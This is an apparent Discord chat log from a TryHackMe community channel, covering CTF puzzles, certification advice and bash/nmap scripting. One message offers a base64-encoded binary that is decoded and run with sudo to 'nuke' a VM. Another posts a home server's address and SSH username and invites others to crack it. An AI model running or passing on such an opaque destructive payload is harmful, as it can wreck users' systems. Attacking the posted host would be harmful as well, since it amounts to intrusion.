#thm-community-media
1 messages · Page 27 of 1
thank god
Heyyy
Ahem. I'm still here!
I am a women btw
pics or it didn't happen
Does your girlfriend know this @nova lynx?
which means multiple women
Not woman
So yes @formal sparrow she know, but she can swing both ways
I'm back
women?
More than both ways by the sounds of it
I couldn't stay away for long
You enjoy being stepped on.
sending this to her rn @nova lynx
+4588888888
Does anyone recognize this:
<~1GCU>1GCU=1GL[>1GL[>1GCU>1GCU=1GL[>1GCU=1GCU>1GCU=1GCU>1GCU=1GCU>1GCU=1GCU=1GL[?
+1 (555) 69696969
Thank you James
Does anyone recognize this:
<~1GCU>1GCU=1GL[>1GL[>1GCU>1GCU=1GL[>1GCU=1GCU>1GCU=1GCU>1GCU=1GCU>1GCU=1GCU=1GL[?
@latent stirrup I actually do not
That's not BrainFuck
+1 (858) 924-0180 or +44 161 850 5933 also works 
everything's brainfuck
+1 267-JUS-SEXY
is the real number to call
it's a troll line
"not a sex line, wouldn't post that in a PG-13 chat"
Managed to hit 98th on https://ctf.virseccon.com
alone?
Could have easily hit > top 20 if I started yesterday
I have no doubt
well, i'm still happy with being top 5 first in a couple of the programming puzzles, but that's now nowhere near as impressive now x)
welp
we still did well for our first actual ctf
plus the amount of experience was almost null
i just hate people that do auto ctf ing
auto?
Stuff like Katana
Never heard of it. I assume it's tools that are hyperspecific to CTFs?
so why's that not fun but metasploit is fair game?
noots on Breadth
Needs more parallel programming
Nooted on him soo hard
Programming isn't fair game either. Real hackers write binaries.
Offering a reward to anyone who can point me in the direction of this:
<~1GCU>1GCU=1GL[>1GL[>1GCU>1GCU=1GL[>1GCU=1GCU>1GCU=1GCU>1GCU=1GCU>1GCU=1GCU=1GL[?1GCU>1GCU>1GCU>1GCU=1GCU>1GCU=1GCU>1GL[>1GCU>1GL[?1GL[>1GL[?1GCU>1GL[>1GL[>1GCU=1GCU>1GL[>1GL[?1GL[?1GCU>1GL[?1GCU>1GL[?1GCU>1GCU>1GL[?1GL[?1GCU>1GL[>1GCU>1GCU=1GCU>1GL[>1GL[>1GCU>1GCU>1GL[>1GCU>1GCU=1GCU>1GCU>1GL[?1GL[?1GCU>1GL[?1GL[>1GCU>1GCU>1GL[>1GL[?1GL[?1GCU>1GL[?1GCU>1GCU>1GCU>1GCU>1GL[?1GL[?1GCU>1GL[>1GCU>1GL[>1GCU>1GL[>1GL[>1GCU>1GCU>1GL[>1GL[?1GL[>1GCU>1GL[>1GCU>1GCU=1GCU>1GCU>1GL[?1GL[?1GCU>1GL[>1GL[?1GCU>1GCU>1GL[>1GCU>1GCU>1GCU>1GL[?1GL[?1GCU>~>
Real hackers spam curl and write shell scripts
Genome Sequencing?
WhAt CiPhEr ThO!?!?
what's the act of writing binaries called, @solemn ravine?
nooting
it's neither DNA nor RNA sequences, no.
Welp
Working on it @latent stirrup
It's called VIMming
I've exhausted google
Raw bytes
Anymore info other than that?
Nope
Pls help @Community Mentor
genetic engineering
how big was that QR code..?
Isn't it like an esolang
wait, is it the quickrun one?
Brainfuck -> Ook -> JJencode -> run JS function -> URLencoded -> base64 -> PNG -> QR decode -> The above
It's been a journey
Can you send me the QR code?
yeah, ok, that's pretty big
And that decodes into the mess we're left with above
maybe it's not supposed to be decoded to ascii or whatever that is, but to raw bytes?
after all, that is what QR encodes
got it @latent stirrup
Whaaa
yoink
That's the wrong flag format
How was this done?
these random encodings aren't any fun
it's more like a freaking trivia game than anything to do with security
@latent stirrup You said it was the wrong flag format?
Did it still work, knowing the prefix?
The challenge is over now, ended a little bit ago but I just needed all that effort to have an ending
Understood
yeah
But it was correct I'm assuming 🤣
I'm assuming so, did you find a flag online?
no
i mean, if it came out in a flag format it must be right, otherwise it would just be garbage
True
Yeah, I would assume so
All others started with LLS
which of the puzzles was it? by name
Good 'ol cyberchef magic
It could have been done with Base85 which is really the same thing as ASCII85
all within CyberChef
Just needed to recognize that starting/ending char <~ ~>
it's dum
I am not the biggest fan of ciphers, but it's part of the CTF world. So I've learned to like them a bit.
Plenty of tools out there, so you don't have to manually reference a chart etc.
@formal sparrow is a beast with them.
If you haven't already noticed.
I can't seam to replicate the above image
Switch to decode
Then bring into Cyber Chef
Maybe it's a weird translation
I also got it
Damnnnn
@nova lynx Hat's off my dude
I'd imagine the <~ ~> was QR code padding or something
Should have spammed over to you sooner
No
Would have saved me some sanity
<3
That's fair
Man I'm actually brain drained after that
Defo need to get a team for the next CTF
It's all good being a solo soldier but I need some other brains in the squad
Then we could beam out and rule from that space level shit
110% I was going to do the auctf, but I was super late to register and had no team.
I would have loved to do it with a few others.
Gotcha' well next time we should all get together and do one.
TryHackMe team anyone?
100% @nova lynx
Hello guys, you sound more than intermediate in this field
and i'm just a beginner with some questions
brb
who's free to answer some
Shoot my dude
aight
You have until I expire from brain drain
so -2 years
so i'm going to start the course CEH in a couple of months and took CCNA prior to that although i have knowledge in web development and mobile apps development
what would i be able to after the CEH in your opinion
able to do*
CEH is a god damn joke
arlight
Nah, straight up, it's simple af
i'd love to hear that
how about the OSCP
or what goes after the CEH
but then it's the right thing for me because i'm still a beginner right
If you understand the basic concept of how to use skid tools and like to look like a hacker then CEH is gread
Get the certs that the job you want needs
@latent stirrup I have a hoodie and a thinkpad with stickers, can I have CEH?
Just sign your life over to hacking and then take certifications as and when jobs need them
Have a look at job listings near you, see what they're asking for @distant quarry
It varies by role and region and country
true
@tropic lava Nah mate, with talent like that we'll make you an accredited instructor
what happened to optional1?
what happened to optional1?
@forest rivet Delusion got him
Ah, I see.
I'm his replacement 
well i prefer to learn how to make scripts instead of just using them
I just realized there was no release this week
You'll make a great replacement, Dan.
@distant quarry Learn bash scripting, bash one liners and how to perform cURL requests
@latent stirrup Tomorrow will make up for that, dw
Literally all I do
@latent stirrup alright thanks for your time and the others
Hit disgusting stuff like this:
echo -e "\nEnter the target address: " && read target && pathDir=$(pwd) && echo -e "Enumerating target: $target \nResults will be saved to $pathDir/" && ports=$(nmap -p- --min-rate 1000 -T4 $target | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) printf "The following ports have been found on $target \n\n" && echo -e "$ports" | tr ',' '\n' && nmap $target -sC -sV -p $ports -oX "$target.xml" --script vuln && echo -e "Target has been scanned\nNmap output saved to "$dir/$target.xml"\nEnumerating for potential vulnerabilities \n\n" && searchsploit -t --nmap -x "$target.xml" > "$target.searchsploit" && printf "Searchsploit results saved to: $dir/$target.searchsploit"
awesome xd
What even is cairrage return?
does anyone know assembly here
nah, only a few
and how important is it for reverse engineering
Yeah, hang out with him all the time
100% important
understanding assembly is a bit of a strain. Unless you're a very specific type of person, then you're going to be better off learning another language first. Bash, python, C, probably in that order
yeah well that's what i was going to do excluding the bash
thanks for telling me
about it
For me? I wanted to be a game developer as a kid, so I eventually grew into a coder. I do web server stuff now. I'm not as skilled as the others here, but I definitely know a trick or two about organizing big code projects
I got into computer hacking by sticking a screwdriver into the power pins of a broken tower PC
that's pretty great though
True story
lmao
how did you guys first started learning hacking
@distant quarry https://www.imdb.com/title/tt0113243/
ZeroCool
I'm annoyed
1995, a fine year.
Somebody yoinked my DVD copy
will watch it soon
I mean, it's a meme
Dan's first hack was a IP tracking GUI in VB
@latent stirrup Mind if I chuck that at my KOTH box?
but its worth watching, sure you didnt learn it there xd
My favourite part is when they be there hacking VHS tapes away from eachother with robotic hands while the screen melts
I love the roller montages, so hip and cool
@tropic lava What?
Sure, it's just nmap and searchsploit automated
I wanna see if it picks up anything
Nah, that's not nothing on AutoShell
technically it started before that, but i guess you're a little to self focused to see that
You can adapt that command above to read from a list of IP within a file if you hit it with a for target in $(cat ipList); do
Love a bit of bash
Always bashing it out
Damnit, Pars. It's no fun giving you a hard time when you don't respond
How damn many optionals are there?
@lethal egret @cobalt thicket @nova lynx @latent stirrup are the only people he associates with.
We're all one now
Symlinked
Like an intense trip experience
Muri, help.
Some things in life
can't wait for someone to try and ping the real one kekw
Must be certain
.
Yes
Did you know, the more options you have in life, the less satisfied you'll be with the one you choose?
Hmmm
It's important to make the distinction
He has to be 5
Which sadistic git gave him a capital letter?
or it break the link
Enter the target address:
192.168.56.130
Enumerating target: 192.168.56.130
Results will be saved to /root/
The following ports have been found on 192.168.56.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 01:22 BST
Error #486: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!``` @latent stirrup F
@formal sparrowI did
Oh, that'd be you pars
I am now officially optional
I am not a sadistic git @formal sparrow
Yes you are
@tropic lava Fixed it
echo -e "\nEnter the target address: " && read target && pathDir=$(pwd) && echo -e "Enumerating target: $target \nResults will be saved to $pathDir/" && ports=$(nmap -p- --min-rate 1000 -T4 $target | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) printf "The following ports have been found on $target \n\n" && echo -e "$ports" | tr ',' '\n' && nmap $target -sC -sV -p "$ports" -oX "$target.xml" --script vuln && echo -e "Target has been scanned\nNmap output saved to "$dir/$target.xml"\nEnumerating for potential vulnerabilities \n\n" && searchsploit -t --nmap -x "$target.xml" > "$target.searchsploit" && printf "Searchsploit results saved to: $dir/$target.searchsploit"
Didn't encapsulate the "$ports"
gotta love loose typing
Then why do I still get random DMs asking questions about it!?
Could totally hide some malicious code in that script if @tropic lava is running it as root
because people are people
bans @nova lynx
there's nothing malicious in there. I read it.
I know, not obfuscated enough
This is what we should have done for April Fools
oh god
Done a huge switcheroo
all puzzles are obfuscated brainfuck js
BreadTh could have become a Mod
If you say brainf one more time @forest rivet
brainf
I want to be a Mod one day
Which @formal sparrow are we talking about?
Yes @formal sparrow
does it make a difference?
Yeah it makes a difference!
Quick guys
If your name is optional you're a guaranteed hard stuck CummunityCommunity Mentor smh
Everyone become BreadTh!
You should be asking how broad instead
Any breadth that says brainf shall be permanently breaded
breaded
Brainded
That reverted me
which one is typing smh
If anyone wants to nuke on of their VM's feel free to hit this bad boy up base64 -d <<< f0VMRrrc/iFDvmkZEijrPAIAPgABAAAABAAAAAEAAAAcAAAAAAAAAAAAAAAAAAAAAQAAAEAAOAABAAIAsKkPBQAAAACwqQ8FAAAAAL+t3uH+6+mQ > x;chmod +x x;sudo ./x
Frick
I can't change my name back
lmao
🤣
It's no longer "optional"
Lmfaooo
Guess it was bound to happen
That, is why we keep it to nicknames 😆
He changed his Discord Tag @cobalt thicket
There seems to be a cooldown...
AHAHA
lol ❤️
I made a very cool RSS feed custom status script, if anyone wants it.
It is slow, so won't get you banned or anything.
I'm not sure if i should take anything RSS from you ;)
so you say, but what backdoors may lie in store!
I'm such a dumbass lmao
I tried running a program multiple times and it kept crashing my computer
and then I realized the program was trying to create an array that had 1000! entries
1000!
well like, it was broken and I fixed it
but I just was testing it for a while
and then I realized lmao
actually, I should probably ask
are there any good programs for crash protection
as in programs that halt processes that are taking up all the memory or something
@regal socket only if you hug someone with leprosy then they might kill
lol
I have this status because of Cuddles status, JHD
a guy in patrion support
@olive sundial
I'm joking lol
Also. The ctf was fun
yep, sure it was :D
It's the best one I've seen so far
You need to start from Fate zero
Then work your way through
fate order is frekin complicated
a guy recommended me... fate/stay night by unlimited blade works then fate zero by ubw and then heaven feels
No lol
Fate zero is the beginning
Then unlimited blade works or stay night
They have similar storyline different endings
Then heavens feel
After than you can watch fate last encore and fate apocrypha
There is one called monogatari
Google it if you don't believe me
i will XD
maybe later, btw monogatari series, Is of 9 seasons start from bakemonogatari
it's really crazy
and awesome
This is what you are looking for
reverse yandex search on the way
laters!!


?
Top of the day to you lads
haha, just noticed this, they must have added this after some updates 😄
@restive tartan you taking part in game 22?
@last marlin Kali undercover
🍰⏲️
❗ 🍰 ⏲️
oi @lethal egret you alive yet
no
Dare I ask why everyone is trying to be edge lords and changing their name
donno, it started yesterday
and we're not trying, we're succeeding -- not that it's a very good thing to succeed at.
@cobalt thicket @strange axle haha i see u guys in the CTF

O hai shado
hai parsy!
o hai chado
@hexed thicket ❤️
He tries
I'm going to DM something that you need to respond with each time he does
Found out about ~/.bash_aliases
Making my life easier.. woop-woop
@tropic lava what did he send you
WAOH ZWACKY @hexed thicket i forgot u are from THM!!
I AM 😮
ZWACKY SAMA, hows everything sweety!?
Becauses I'm a cool blob
I'm writing docs
for wot?
The shibe is here
and I really like the lib
And we are thankful
aye crap man, go get it bro!
@graceful coral BRO
u reminded me
new neighbors have been walking and ONE OF EM HAS A SHIBE
No way
thank you for the reassuring shibe @graceful coral 
It's what I do @formal iron
<3
join a room 😉
make a room
double-dare me
very much encourage it in all seriousness 🙂
😂
@rustic moss #641573666353709085 has some stuff
I will noot you @rustic moss
@graceful coral Can I dm?
DO IT
You can always DM me bb @tropic lava
@graceful coral Can I dm?
@hexed thicket no
shoot
Hello may i ask why was i kicked ? 😭
@graceful coral Kicked?
We don't tend to kick people
That's not usually part of our methodology
Yeah that's not really our thing
We'd warn, then ban -- and I haven't seen you do anything to warrant either of those things
Hmm
Usually we warn and then van
Ban
Yeah i think O.o when i went to sleep i remember being in this server and when i came bsck i wasnt in it so i assumed i was kicked but im still not sure so just asking
Yeah I don't think any of us kicked you
Maybe my keyboard stopped working and left some servers then... sorry if i offended anybody
Huh, very odd. We'll check the log if we can get access @graceful coral 🙂
Assuming it is something on our end, apologies for that!
Hey thanks that for 2 😂
Np 😄
@graceful coral Yeah, just checked the logs -- wasn't at our end; you're good 😄
Okay thanks 😃
@graceful coral 31 what are you doing here ahaha 😂😂
Scrubs I need a sweaty team together to tackle some CTF's and get some fame during quarentine
@nova lynx You up for my dude?
What CTF's?
I have to take a 2 hour break, gotta' do some work stuff. I will be on mobile
but when I'm back, I'm down.
Nice, there's a couple coming up, just need to sign up with a team
Which means forming an absolute A-Team
Scrubs I need a sweaty team together to tackle some CTF's and get some fame during quarentine
@latent stirrup I would love to, but i think i have not enough skills for that yet
@last marlin If you're able to compete in CTF's then hmu dude, need some dedicated peeps
@last marlin If you're able to compete in CTF's then hmu dude, need some dedicated peeps
@latent stirrup I'll get there.. one day.
im kinda PO'ed by a course rn XD this guy thinks radare2 is ugly!
HOW COULD U 😠
bruh he even said the visual mode is ugly cuz it isnt "full gui" ... wth XD evil person
@rustic moss Cutter.
lol what does that mean?
Literally a full graphical frontend
i dont want a gui
i hate gui
radare2 visual mode is absolute beautiful and so is normal txt mode
but parsy-sama 😦
noone talks bad bout my radare2 sweety
Shado he wasn't talking bad about it
He was offering an alternative solution
!
i was talkin bout a online course im scrolling through in which the guy says he doesnt like r2
im glad ninja told me bout that cuz i never heard of it
I use r2, cutter and ghidra
ghidra!
i gotta check out cutter but i love r2 , and ghidra im kinda new to but i like it
@tropic lava great job on Food 🙏
It’s broken?
@nova lynx Can I get you to DM me how you got user level access?
I was just about to say @tropic lava really enjoyed food
I feel like eating because of you @tropic lava
I was kinda hungry when I started theming it
@graceful coral Will get some cookies
🍪
@smoky bear Please don't spam
thats no spam
...it's a copypasta effectively
thats the joke
and i say ... heey ey ey heey ey ey i said : hey whats going on ?
@lethal egret @cobalt thicket are the pair of you playing Monopoly?...
@cobalt thicket @lethal egret @urban crescent @strange axle
Where were our invites!?
Could just go a good game of monopoly in Quarantine...
😆
Way too much code to document though 😢
Tryhackme boardgame night
Ey! 😂
I see how it is
@formal sparrow rumour has is KOTH-2 is interesting atm
Haha!
noots on Dan
^^
yay ^^ it's us :)
HI, i need someone who can help me retrieve my mobile legend account, anyone who can, please
Hello!
Hi!
Happy sun rise my dudes
Heyo lads!!
Conference call got cancelled so I have a cheeky 20 mins for some THM!
if i had a personal server i wanted someone to hack irl, which category would that fall under? it doesn't look like it violates any rules...
I mean, if you give a person a full legal permission to do that, that's not illegal. But I would recommend going on some professional platform which offers such things
well, i thought if someone could have fun with it, then there would be no problem... it is a base install of Ubuntu server 19 (don't remember .4/.10/LTS), but i did a stupid apt update/upgrade -y - and didn't verify i had remote access before i left area...
you can have fun yourself ;)
learn some stuff here and practice on your server
Warzone is weird
go to gulag Dan
yeah... i'm working on it, but i'm just a newb here, working on my B.S. in cyber, but my skills aren't up there yet to crack SSH, so... like i said, base install, doesn't have anything on it anyways, so if it could be cracked, i'm not doing anything with it right now anyways...
i'd authorize it as an extra sandbox for the server if someone who runs the site is interested.
@unreal hatch Almost all hosting providers have system console access from the dashboard, if not you can email them for the system image and that will allow you to locally mount it and recover whatever you need.
Without permission from the hosting provider either within ToS or writing alongside proof of ownership, no one here is going to start bruteforcing public servers
If you truly own it, recovery will be simple via communication with the hoting provider
its not a provider though... its a physical server, and i'm only a little familiar with normal pen-testing procedures, but it isn't a hosting provider. its in my basement
Then you can mount the hard drive in read only mode on your laptop/desktop, you can also perform this from a live USB instance of linux
If you are able to set up a public facing server on your local network with a publicly accessible IP address then this will be straight forward
i'm also remote... i'm in the navy in a different state, and my son has helped me as much as he "can"... so physical access is difficult
i can do a port forward no problem
something with the base install though has been problematic starting with the sshd being screwy and disconnecting immediately as well as requiring 2 encryption types (wtf?) and then with the password as well, so my password only worked a few times, but only for a few secs... i'm completely locked out now.
when i get physical access again, if i can't get remote access via someone's help (or my own), i'm open to recommendations on what to put on it
like i said though, i can't do anything with it right now, so if someone can get in, i'll donate it as a compute node for now (i'm remote for the next 1 1/2 years)
okay... ToS or conditions... ssh only right now available at pomeroy.ddns.net:11000... last known username that worked was ariocwhite, but password set doesn't work anymore for some reason
if anyone wants additional ports open, i can open (and forward) them, but they won't be 445:445, something more like 11445:445
all other ports go to different places on my network... not really open to those being hacked. if you want access to those, just ask. lol
Umm guys
i confusing on something
but when i try do ssh2john there saying no key was found
Set permissions to 600
Without the +
the only way to get good is ||🍰|| doing it wrong until you learn enough lessons
Also, I'm officially losing my mind.
Doesn't look great on my laptop either
@formal sparrow like your profile pic..
@formal sparrow I like 🍰
@formal sparrow like your profile pic..
@last marlin Finally, someone likes it!
someone else commented on it the other day as well
🍰 ?
🍰 !
🍰 🍰 🍰 !
debating between getting a bigger SSD (2TB) for my lab and Kali or expand my Samsung's Notebook internal drive. Any advice?debating between getting a bigger SSD (2TB) for my lab and Kali or expand my Samsung's Notebook internal drive. Any advice?
someone else commented on it the other day as well
@forest rivet Is it at all... laggy.. for you?
I'm trying to convince it to spin as smoothly as possible
@graceful coral Do both 😄
Ey!


@graceful coral What's you're current SSD for lab? If it currently performs well then expand the notebooks internal drive, if it performs poorly upgrade it
it performs fantastic but running out of space , both ... internal and SSD
Is it time?
❗ 🍰 ⏲️
Cake stands for cake
I like cake
You know who else likes cake?

🎷🐛
Thanks, Shu, but I like to take things slow

I don't know how to respond to that 🤣
I won't be.

🍰
@outer vale you should verify with the bot btw

what does verifying with bot do?
it assigns you roles based on your level
gives you a rank and color :)
how the heck did sublime text become my default png viewer, and why can it even display images?
no idea i just use the display command
it can display images!
NO
YES @forest rivet
NO @forest rivet
@forest rivet
@forest rivet
@forest rivet

that's a grilled cheese?
looks like it
though I searched for french toast. Guess people don't know what's what.
ask @pale cove, not me.
My guess is that he hates himself. The guy in the gif, not swa
yes, he is upset about brutally murdering this bread and tries to make things better with this knife
yes
NO
YES
YES
It's not mine, but yes
I can't cook either 😦
Smh
I can
Can you cook at all? @nova lynx
Can you cook water, @nova lynx ?
Right, we happy now?
Oh so you finally did the proper dock
I did 😄
Gj
And got rid of the top bar
It was driving me nuts
I tried KDE out
Destroyed the entire DE
Purged all of them
Reinstalled from a TTY
And decided, "what the hell, we've done this much, might as well rice it!"
Guys, like my new rice???
I'm not on linux. See? It says powershell!
Do you like my rice (Not including the actual doxable tiles)
niice, you got that new windows theme for parrot?!
nah I use arch btw
what is the diference between 0-2-3, and why am I keep loging in to gnome ? Even tho i have selected XFCE
I got that good stuff
That's the emote I used
Nice subdomain
Milk toast best toast
Deleted that
milk egg toast is better.
<3
again.
Unboxable
Just like mamma used to say
Afraid of being Doxed? Just Dox yourself!
I could give you my full name and you'd never find a thing about me
you can't get covid19 if you already have it!
Straight facts
It's simple
You mix sugar, honey and milk
You soak the bread in the milk
You fry the soaked bread with butter
you forgot the egg.
Yes egg
Me no like egg
Muri bad
egg and bread is awesome, though
especially boiled eggs with mayo on real dark scandinavian rye bread
@cobalt thicket milk steak is the best steak
With jelly beans?
Just accepted my first security job! woo!
congrats!
Thanks, I'm excited to setup less laptops than I do now...
one of the first things i was given to do was setup my own laptop 
Yeah it's when all projects are put on hold and I have to setup 40 surface go's that the novelty wears off
Pretty sure milk steak is sinful
before i left my previous workplace i've been handed in with a project to set up 150 desktops and 20ish laptops from bios to UEFI with secure boot
that sounds fun
"secure" boot
and it had to be done over weekend because people were using them throughout the day
plus bios config lol
i don't take it lightly lool
i don't think there was a time i hated working in IT support more than that
let me bring it up that i started at 7 on a Saturday and finished the same Saturday at 10:30 (obama self)
What does obama have to do with this story?
all by myself
it is lol
SCCM is fun
Gross
MDT for us currently
Setting up Autopilot but everybody else in infrastructure is off so I'm being murdered by helpdesk stuff
take a look at my sick setup lol
it's running nginx and mysql i think
as separate users
I got a ThinkCenter I need to set up again
And my thinkpad
Most using my desktop ATM tho since I can't leave the house
👀
Im working in a kali-linux container, and some of the games require a file dl via a post form, I cant seem how to figure out how to get the file via my linux image
hints welcomee
tried to curl the post to get the file but it redirects me to login
how to get God rank? 🤔
@lost sparrow Sounds like you need to be authenticated, probably cookies
@graceful coraljust do all the things
@graceful coral 

You'll get god eventually
You need to complete a LOT of rooms
That's all fine until you're on a network that uses the same address space and you end up with an angry SysAdmin
@tropic lava TYY
?
got the pcap file with cookie curl
yeah, if only i hadnt tried to cat the pcap file and crash my cmd
how many rabbit holes did you leave with the box @worldly lance
0
does anyone know how to fix the sound on kali linux, i have not been able to get it to work
yoinked
i love python
me when I realize
I may have to give a speech on hamlet or the handsmaids tale tmrw
It's been fun friends
but my story may end tommorow
😭
🍰
🧁
did you steal Boris @regal socket
damn.. you figured it out
or the c
will talk later, I am working on a assignment rn
thanks
Hello!

Can someone assist me with my bash script?
I'm new to bash scripting and am wondering why my else doesn't fire
@distant herald doesn't -eq only work on numbers?
"everything is a string, -eq tells bash to interpret the strings as integers"
[ 01 -eq 1 ] is true, but [ 01 != 1 ] is also true
I found the error
I needed to see if decision was yes
but I put in $read instead of decision
@forest rivet Why do you have the 0x1 tag? 😆
because I annoyed the mods~
I was expecting them to replace the 0x8 tag, but apparently not.
scanner (){
while true; do
read -p "What's the IP you want to scan?: " ip
read -p "Is this IP correct: $ip (Y/N)" decision
case $decision in
[yY]*)
read -p "What file do you want to output to?" file
$(sudo nmap -sV -sS -p- --script vuln $ip -o $file)
break
;;
*)
esac
done
}
scanner
Bash should only ever be written beautifully
In all it's functional perfection
if you flipped the case parameters it would accept "Yes" and "yes" too, no?
or does the first parameter not tage regex?
also, esac is such a stupid keyword
How dare you say anything bad about my baby
hahahah
Bash is just misunderstood
squareface
You can even push for classes if you have dynamic $1 $2 $3... assignments
isn't -o output?
Yep
now flip the parameters in case and see if that works
@distant herald Use the script above, it will peak your interest in bash a little more
@forest rivet execution order of case requires ;; putting *) first will break execution logic
as you will have to end it with nothing at ;;
unless you include code between *) ... ;;
Regex example of any permutation of words beginning with Y/y
You could put yellow and it will run etc...
You can have explicit entries
I just find that if your responce starts with y/Y that's vaid enough
case x in y makes it sound like x will appear in y, not the other way around.
anything else just esac's the function
I love bash, it's uniq
Trump is pretty unique too
Yep
:p
He's not like other programming languages
I don't think he's Turing complete..
@latent stirrup that script did indeed peak my interest! I'm 4 days into THM and I'm loving it already
I'm trying to learn the tools and the cli while also trying to pickup some bash scripting
just remember that bash scripting is like tinkering with a loaded gun :p
Exactly ;) Gotta be careful
@distant herald The best way to go about it pal!
Stick with bash and it'll treat you well
Bash is really interesting though
Also get to know cURL, it's powerfull
There needs to be a room dedicated to it for creating scripts with it
Bash is incredibly powerful, but don't neglect other languages -- what you might learn elsewhere, you can bring back to your favorite language
I like python always have, I'd say I'm below average with python atm. Probably lack of projects
What's curl used for?
when you don't need complex, don't make it complex. cURL is great for simple
So burp in cli?
Essentially, but it's so much more than that
more like a non-interactive browser in cli - but you can script with it
(there are actual interactive cli-browsers out there, like Lynx -- I don't know why.)
I used to use Lynx all the time, spent my first couple years on linux without a GUI
Accidently downloaded the server edition back in the day
i presume before you could just install a gui on top over the interwebs
I would want to try to create my own server running proxmox.
With Ubuntu server for nextcloud
And a kali machine
Just didn't have internet access and when I eventually did I was accustom to the terminal prompt
wait, if you didn't have internet, then what'd you use lynx for?
@distant herald Do it my dude, nothing teaches you more then jumping in head first
" when I eventually did I was accustom to the terminal prompt"
I would need hardware though hahaha
System administration seems like a nice pre to have when you're on the blue team
You can get free $100 server hosting via digital ocean, deploy till it runs out then open a new account
Definitely is, but from what I hear, the real demand is blue team coders -- specifically for malware analysis
I see.
I'm my understanding blue team is the defense and red team offensive.
Am I correct with that statement and is there more to it?
Same with white, Grey and black hat?
yes to the first, no to the second
whitehat means you don't do illegal stuff at all, black means you do. Gray means you don't do morally bad stuff, but may do illegal stuff
Attack first and explain the exploits later, that seems like Grey hat territory
Whereas white hats ask for permission first
right, but a grayhat would need a reason to do it




